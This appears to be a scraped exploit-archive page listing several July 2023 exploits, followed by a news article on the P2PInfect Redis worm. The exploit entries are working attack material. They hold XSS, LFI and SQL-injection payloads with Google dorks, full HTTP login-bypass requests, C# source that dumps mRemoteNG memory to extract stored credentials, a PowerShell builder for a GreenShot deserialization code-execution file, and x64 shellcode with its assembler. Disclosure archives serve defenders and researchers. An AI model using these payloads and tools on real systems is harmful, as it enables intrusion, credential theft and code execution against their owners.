Joomla iProperty Real Estate extension version 4.1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: The Thinkery LLC# Vendor Homepage: http://thethinkery.net# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/# Demo: https://iproperty.thethinkery.net/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /iproperty/property-views/all-properties-with-mapGET parameter 'filter_keyword' is vulnerable to XSShttps://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4[-] Done

Joomla iProperty Real Estate 4.1.1 Cross Site Scripting

Codecanyon Bitcoin Tools Suite version 1.0 suffers from a local file inclusion vulnerability.

    ========================================================================================================| # Title     : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability                                  || # Author    : indoushka                                                                              || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                | | # Vendor    : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html |  | # Dork      : "Powerful bitcoin and cryptocurrency tools & tickers."                                 |========================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : index.php    line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');[+] http://localhost/btcon/index.php?website['template'] = evilGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Codecanyon Bitcoin Tools Suite 1.0 Local File Inclusion

CMVC SHOP LMS version 2.1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMVC SHOP LMS v 2.1.0 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               | | # Vendor    : http://www.cmvcshop.com/                                                                                           |  | # Dork      : All rights reserved CMVC SHOP                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/cmvcshopcom/product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/wwwcmvcshopcom/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMVC SHOP LMS 2.1.0 SQL Injection

mRemoteNG version 1.77.3.1784-NB exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

    # Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory# Google Dork: -# Date: 21.07.2023# Exploit Author: Maximilian Barz# Vendor Homepage: https://mremoteng.org/# Software Link: https://mremoteng.org/download# Version: mRemoteNG <= v1.77.3.1784-NB# Tested on: Windows 11# CVE : CVE-2023-30367/*Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users tostore and manage multi-protocol connection configurations to remotely connect to systems.mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-devloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,even if no connection has been established yet. This allows attackers to access contents of configuration files in plain textthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper*/using System;using System.Collections;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Reflection;using System.Runtime.InteropServices;using System.Text;using System.Text.RegularExpressions;namespace mRemoteNGDumper{public static class Program{public enum MINIDUMP_TYPE{MiniDumpWithFullMemory = 0x00000002}[StructLayout(LayoutKind.Sequential, Pack = 4)]public struct MINIDUMP_EXCEPTION_INFORMATION{public uint ThreadId;public IntPtr ExceptionPointers;public int ClientPointers;}[DllImport("kernel32.dll")]static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);[DllImport("Dbghelp.dll")]static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);static void Main(string[] args){string input;bool configfound = false;StringBuilder filesb;StringBuilder linesb;List<string> configs = new List<string>();Process[] localByName = Process.GetProcessesByName("mRemoteNG");if (localByName.Length == 0) {Console.WriteLine("[-] No mRemoteNG process was found. Exiting");System.Environment.Exit(1);}string assemblyPath = Assembly.GetEntryAssembly().Location;Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";FileStream procdumpFileStream = File.Create(dumpFileName);MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();// A full memory dump is necessary in the case of a managed application, other wise no information// regarding the managed code will be availableMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);procdumpFileStream.Close();filesb = new StringBuilder();Console.WriteLine("[+] Searching for configuration files in memory dump.");using (StreamReader reader = new StreamReader(dumpFileName)){while (reader.Peek() >= 0){input = reader.ReadLine();string pattern = @"(\<Node)(.*)(?=\/>)\/>";Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);if (m.Success){configfound = true;foreach (string config in m.Value.Split('>')){configs.Add(config);}}}reader.Close();if (configfound){string currentDir = System.IO.Directory.GetCurrentDirectory();string dumpdir = currentDir + "/dump";if (!Directory.Exists(dumpdir)){Directory.CreateDirectory(dumpdir);}string savefilepath;for (int i =0; i < configs.Count;i++){if (!string.IsNullOrEmpty(configs[i])){savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);using (StreamWriter writer = new StreamWriter(savefilepath)){writer.Write(configs[i]+'>');writer.Close();}}}Console.WriteLine("[+] Done!");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );}else{Console.WriteLine("[-] No configuration file found in memorydump. Exiting");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);}}}}}

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

GreenShot version 1.2.10 suffers from an insecure deserialization arbitrary code execution vulnerability.

    # Exploit Title: GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution# Date: 26/07/2023# Exploit Author: p4r4bellum# Vendor Homepage: https://getgreenshot.org# Software Link: https://getgreenshot.org/downloads/# Version: 1.2.6.10# Tested on: windows 10.0.19045 N/A build 19045# CVE : CVE-2023-34634## GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file# will lead to arbitrary code execution## Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net./ysoserial.exe -f BinaryFormatter -g WindowsIdentity  -c "calc" --outputpath payload.bin -o raw#load the payload$payload = Get-Content .\payload.bin -Encoding Byte# retrieve the length of the payload$length = $payload.Length# load the required assembly to craft a PNG fileAdd-Type -AssemblyName System.Drawing# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell$filename = "$home\poc.greenshot"$bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file$payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding  Byte -NoNewline# append the signature"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii# launch greenshot. Calc.exe should be executedInvoke-Item  $filename

GreenShot 1.2.10 Arbitrary Code Execution

CMSshop version 1 suffers from a cross site scripting vulnerability.

**CMSshop 1 Cross Site Scripting**

Posted Jul 31, 2023

Authored by indoushka

CMSshop version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 987e4a7e0d2984ae1bf6c18eb68c0343d8d4d8903869ab00d311e71710917c70

Download | Favorite | View

**CMSshop 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMSshop(ir) v1 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               || # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22                   /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22            [+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,806)
*   Arbitrary (16,170)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,026)
*   Code Execution (7,254)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,386)
*   Encryption (2,366)
*   Exploit (51,705)
*   File Inclusion (4,218)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (891)
*   Java (3,038)
*   JavaScript (853)
*   Kernel (6,658)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,587)
*   Python (1,531)
*   Remote (30,698)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,879)
*   Shell (3,177)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,329)
*   TCP (2,399)
*   Trojan (687)
*   UDP (886)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,628)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,889)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,301)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,624)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,782)
*   UNIX (9,272)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CMSshop 1 Cross Site Scripting

169 bytes small Windows/x64 PIC NULL-free calc.exec shellcode.

    import ctypes, structfrom keystone import *# Shellcode Author: Senzee# Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)# Date: 07/26/2023# Platform: Windows x64# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763# Shellcode size: 169 bytes# Shellcode Desciption: Windows x64 shellcode that dynamically resolves the base address of kernel32.dll via PEB and ExportTable method.# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.CODE = ("find_kernel32:"" xor rdx, rdx;"" mov rax, gs:[rdx+0x60];"    # RAX stores  the value of ProcessEnvironmentBlock member in TEB, which is the PEB address" mov rsi,[rax+0x18];"    # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure" mov rsi,[rsi + 0x20];"    # RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure" mov r9, [rsi];"    # Current module is python.exe" mov r9, [r9];"    # Current module is ntdll.dll" mov r9, [r9+0x20];"    # Current module is kernel32.dll" jmp call_winexec;""parse_module:" # Parsing DLL file in memory" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores  the base address of the module, get the NT header offset" xor r15, r15;"" mov r15b, 0x88;"    # Offset to Export Directory   " add r15, r9;"" add r15, rcx;"" mov r15d, dword ptr [r15];"    # Get the RVA of the export directory" add r15, r9;"    # R14 stores  the VMA of the export directory" mov ecx, dword ptr [r15 + 0x18];"    # ECX stores  the number of function names as an index value" mov r14d, dword ptr [r15 + 0x20];"    # Get the RVA of ENPT" add r14, r9;"    # R14 stores  the VMA of ENPT"search_function:"    # Search for a given function" jrcxz not_found;"    # If RCX is 0, the given function is not found" dec ecx;"    # Decrease index by 1" xor rsi, rsi;"" mov esi, [r14 + rcx*4];"    # RVA of function name string" add rsi, r9;"    # RSI points to function name string"function_hashing:"    # Hash function name function" xor rax, rax;"" xor rdx, rdx;"" cld;"    # Clear DF flag"iteration:"     # Iterate over each byte" lodsb;"     # Copy the next byte of RSI to Al" test al, al;"     # If reaching the end of the string" jz compare_hash;"     # Compare hash" ror edx, 0x0d;"     # Part of hash algorithm" add edx, eax;"     # Part of hash algorithm" jmp iteration;"     # Next byte"compare_hash:"     # Compare hash" cmp edx, r8d;"" jnz search_function;"     # If not equal, search the previous function (index decreases)" mov r10d, [r15 + 0x24];"     # Ordinal table RVA" add r10, r9;"     # Ordinal table VMA" movzx ecx, word ptr [r10 + 2*rcx];"     # Ordinal value -1" mov r11d, [r15 + 0x1c];"    # RVA of EAT" add r11, r9;"    # VMA of EAT" mov eax, [r11 + 4*rcx];"    # RAX stores  RVA of the function" add rax, r9;"    # RAX stores  VMA of the function" ret;""not_found:"" ret;""call_winexec:""    mov r8d, 0xe8afe98;"     # WinExec Hash"    call parse_module;"     # Search and obtain address of WinExec"    xor rcx, rcx;""    push rcx;"    # \0"    mov rcx, 0x6578652e636c6163;"    # exe.clac "    push rcx;""    lea rcx, [rsp];"    # Address of the string as the 1st argument lpCmdLine"    xor rdx,rdx;""    inc rdx;"    # uCmdShow=1 as the 2nd argument "    sub rsp, 0x28;""    call rax;"     # WinExec)# Payload size: 169 bytes# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"# buf += b"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"# buf += b"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"ks = Ks(KS_ARCH_X86, KS_MODE_64)encoding, count = ks.asm(CODE)print("%d instructions..." % count)sh = b""for e in encoding:    sh += struct.pack("B", e)shellcode = bytearray(sh)sc = ""print("Payload size: "+str(len(encoding))+" bytes")counter = 0sc = "buf =  b\""for dec in encoding:    if counter % 20 == 0 and counter != 0:        sc += "\"\nbuf += b\""    sc += "\\x{0:02x}".format(int(dec))    counter += 1if count % 20 > 0:  sc += "\""  print(sc)print("Payload size: "+str(len(encoding))+" bytes")

Windows/x64 PIC NULL-Free Calc.exec Shellcode

CMSninesol version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSninesol v1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ninesol.com                                                                                            |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/comwaveedupk/download.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSninesol 1.0 Cross Site Scripting

Wifi Soft Unibox Administration 3.0 and 3.1 is vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page.

    # Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"# Date: 07/2023# Exploit Author: Ansh Jain @sudoark# Author  Contact : arkinux01@gmail.com# Vendor Homepage: https://www.wifi-soft.com/# Software Link:https://www.wifi-soft.com/products/unibox-hotspot-controller.php# Version: Unibox Administration 3.0 & 3.1# Tested on: Microsoft Windows 11# CVE : CVE-2023-34635# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable toSQL Injection, which can lead to unauthorised admin access for attackers.The vulnerability occurs because of not validating or sanitising the userinput in the username field of the login page and directly sending theinput to the backend server and database.## How to ReproduceStep 1 : Visit the login page and check the version, whether it is 3.0,3.1, or not.Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field andenter any random password.Step 3 : Fill in the captcha and hit login. After hitting login, you havebeen successfully logged in as an administrator and can see anyone's userdata, modify data, revoke access, etc.--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Request-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameters: username, password, captcha, action-----------------------------------------------------------------------------------------------------------------------POST /index.php HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 83Origin: https://255.255.255.255.host.comReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersusername='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Login Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 302 FoundServer: nginxDate: Tue, 18 Jul 2023 13:32:14 GMTContent-Type: text/html; charset=UTF-8Location: ./dashboard/dashboardExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Request--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------GET /dashboard/dashboard HTTP/2Host: 255.255.255.255.host.comCookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858dUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://255.255.255.255.host.com/index.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------### Successful Loggedin Response--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------HTTP/2 200 OKServer: nginxDate: Tue, 18 Jul 2023 13:32:43 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheCache_control: private<!DOCTYPE html><html lang="en">html content</html>

CVE-2023-34635: Wifi Soft Unibox Administration 3.0

The P2PInfect peer-to-peer (P2) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet.
"The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News.
"A common attack

The P2PInfect peer-to-peer (P2) worm has been observed employing previously undocumented initial access methods to breach susceptible Redis servers and rope them into a botnet.

"The malware compromises exposed instances of the Redis data store by exploiting the replication feature," Cado Security researchers Nate Bill and Matt Muir said in a report shared with The Hacker News.

"A common attack pattern against Redis in cloud environments is to exploit this feature using a malicious instance to enable replication. This is achieved via connecting to an exposed Redis instance and issuing the SLAVEOF command."

The Rust-based malware was first documented by Palo Alto Networks Unit 42, calling out the malware's ability to exploit a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) to obtain a foothold into Redis instances. The campaign is believed to have commenced on or after June 29, 2023.

However, the latest discovery suggests that the threat actors behind the campaign are leveraging multiple exploits for initial access.

This is not the first time the SLAVEOF command has been abused in the wild. Previously, threat actors associated with malware families such as H2Miner and HeadCrab have abused the attack technique to illicitly mine cryptocurrency on compromised hosts.

In doing so, the goal is to replicate a malicious instance and load a malicious module to activate the infection.

Another initial access vector entails the registration of a malicious cron job on the Redis host to download the malware from a remote server upon execution, a method previously observed in attacks mounted by the WatchDog cryptojacking group.

A successful breach is followed by the distribution of next-stage payloads that allow the malware to alter iptables firewall rules at will, upgrade itself, and potentially deploy cryptocurrency miners at a later date once the botnet has grown to a specific size.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

"The P2Pinfect malware makes use of a peer-to-peer botnet," the researchers said. "Each infected server is treated as a node, which then connects to other infected servers. This allows the entire botnet to gossip with each other without using a centralized C2 server."

A notable trait of the botnet is its worming behavior, enabling it to expand its reach by using a list of passwords to brute-force SSH servers and attempting to exploit the Lua sandbox escape vulnerability or use the SLAVEOF command in the case of Redis servers.

"P2Pinfect is well-designed and utilizes sophisticated techniques for replication and C2," the researchers concluded. "The choice of using Rust also allows for easier portability of code across platforms (with the Windows and Linux binaries sharing a lot of the same code), while also making static analysis of the code significantly harder."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows